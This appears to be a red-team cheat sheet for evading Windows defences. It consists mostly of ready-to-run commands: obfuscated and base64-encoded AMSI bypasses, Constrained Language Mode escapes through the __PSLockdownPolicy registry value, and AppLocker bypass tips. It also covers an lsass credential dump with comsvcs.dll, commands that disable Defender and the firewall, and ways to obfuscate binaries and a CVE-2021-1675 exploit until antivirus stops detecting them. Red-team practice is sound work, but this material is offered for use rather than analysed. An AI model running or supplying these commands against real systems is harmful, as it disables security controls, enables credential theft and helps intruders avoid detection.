Get all GPO's applied to a machine
System-wide transcription
Script Block logging
AntiMalware Scan Interface (AMSI)
Constrained Language Mode (CLM) - Integrated with Applocker and WDAC (Device Guard)
Not meant to be a security measure
powershell –executionpolicy bypass .\script.ps1
powershell –c <cmd>
powershell –enc
powershell.exe -executionpolicy bypass
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Fuck around with invoke-obfuscation till it doesn't get detected anymore
Amsi bypass base64 encoded strings
function b64decode
{
param ($encoded)
$decoded = $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
return $decoded
}
$1 = b64decode("U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=")
$2 = b64decode("YW1zaUluaXRGYWlsZWQ=")
$3 = b64decode("Tm9uUHVibGljLFN0YXRpYw==")
[Ref].Assembly.GetType($1).GetField($2,$3).SetValue($null,$true)
Creating scripts that bypass amsi
$ExecutionContext.SessionState.LanguageMode
Escapes for Constrained Language Mode
Launch Powershell Version 2
Powershell.exe -Version 2
Overwrite __PSLockdownPolicy variable
If CLM is not implemented correctly and is using __PSLockdownPolicy
Check the __PSLockdownPolicy value
Value 4 is enabled
Value 8 is disabled
(Get-ItemProperty 'hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -name "__PSLockdownPolicy").__PSLockDownPolicy
Set lockdown policy to 8 and check language mode
Set-ItemProperty 'hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -name "__PSLockdownPolicy" -Value 8
powershell.exe
$ExecutionContext.SessionState.LanguageMode
#Requires -RunAsAdministrator
If ( $ExecutionContext.SessionState.LanguageMode -eq "ConstrainedLanguage") {
Set-ItemProperty 'hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -name "__PSLockdownPolicy" -Value 8
Start-Process -File PowerShell.exe -Argument "-file $($myinvocation.mycommand.definition)"
Break
}
Write-Host $ExecutionContext.SessionState.LanguageMode
Start-Sleep -s 10
PowerShdll Run PowerShell with dlls only.
rundll32 PowerShdll,main -i
Download files with certutil
You can not use iwr but you can use certutil in constrained language mode
certutil -urlcache -split -f <URL>
It is possible to execute scripts on the filesystem but you can't load them!
If applocker is there enumerate it to find a directory that lets you execute scripts in
AppLocker rules are split into 5 categories - Executable, Windows Installer, Script, Packaged App and DLLs, and each category can have its own enforcement (enforced, audit only, none).
AppLocker has a set of default allow rules such as, "allow everyone to execute anything within C:\Windows*" - the theory being that everything in C:\Windows is trusted and safe to execute.
The difficulty of bypassing AppLocker depends on the robustness of the rules that have been implemented. The default rule sets are quite trivial to bypass in a number of ways:
Executing untrusted code via trusts LOLBAS's.
Finding writeable directories within "trusted" paths.
By default, AppLocker is not even applied to Administrators.
Uploading into C:\Windows
requires elevated privileges, but there are places like C:\Windows\Tasks
that are writeable by standard users.
DLL enforcement very rarely enabled due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break.
Good repo for bypasses: https://github.com/api0cradle/UltimateAppLockerByPassList
Check if applocker policy is running
Get-AppLockerPolicy -Effective
Enumerate applocker policy
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Check applocker policy in registery
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
Get-DomainGPO -Identity *applocker*
Parse-PolFile "<GPCFILESYSPATH FROM GET-DOMAINGPO>\Machine\Registry.pol" | select ValueName, ValueData
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
If code integrity is enforced and PowerShell is running in Constrained Langauge Mode use winrs instead of psremoting
runas /netonly /user:<DOMAIN\<USER> cmd.exe
winrs -r:<PC NAME> cmd
.p7b
is a signed policy
Check if there are any .xml
files which didn't got removed with the policy
ls C:\Windows\system32\CodeIntegrity
For example dumping lsass:
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 708 C:\Users\Public\lsass.dmp full
dir C:\Users\Public\lsass.dmp
With non-admin privileges:
RunWithRegistryNonAdmin.bat
Use Winrs instead of PSRemoting to evade System-wide-transcript and deep script block logging
winrs -remote:server1 -u:<COMPUTERNAME>\<USER> -p:<PASS> hostname
Check if windows defender is running
Get-MpComputerStatus
Get-MpComputerStatus | Select RealTimeProtectionEnabled
Get info about Windows Defender
Find excluded folder from Windows Defender
Get-MpPreference | select Exclusion*
(Get-MpPreference).Exclusionpath
Set-MpPreference -ExclusionPath "<path>"
Get-DomainGPO -Identity *defender*
Parse-PolFile "<GPCFILESYSPATH FROM GET-DOMAINGPO>\Machine\Registry.pol" | select ValueName, ValueData
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPReference -DisableIOAVProtection $true
powershell.exe -c 'Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPReference -DisableIOAVProtection $true'
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
powershell.exe -c 'Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False'
netsh advfirewall firewall add rule name="Allow port" dir=in action=allow protocol=TCP localport=<PORT>
Obfuscate binary with https://github.com/mkaring/ConfuserEx
Launch ConfuserEx
In Project tab select the Base Directory where the binary file is located.
In Project tab Select the Binary File that we want to obfuscate.
In Settings tab add the rules.
In Settings tab edit the rule and select the preset as Normal
.
In Protect tab click on the protect button.
We will find the new obfuscated binary in the Confused folder under the Base Directory.
If script gets detected use:
csc.exe /target:exe /out:C:\tools\defendercheck.exe C:\Tools\DefenderCheck\DefenderCheck\DefenderCheck\Program.cs
pyinstaller.exe --onefile .\CVE-2021-1675.py
pyarmor pack --clean -e "--onefile " .\CVE-2021-1675.py
Export the current user rights set by the group policies to a text file:
secedit /export /cfg secpolicy.inf /areas USER_RIGHTS
Change the SeDebugPrivileges to S-1-5-32-544
the Local administrator group.
notepad.exe secpolicy.inf
Save the new user rights set
secedit /configure /db secedit.sdb /cfg secpolicy.inf /overwrite /areas USER_RIGHTS
Check privileges with whoami
if not having SeDebugPrivilege do PsExec.exe -i cmd.exe
Enable SMB shares for local admin users
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1 /f
Get-service LanmanServer | restart-service -verbose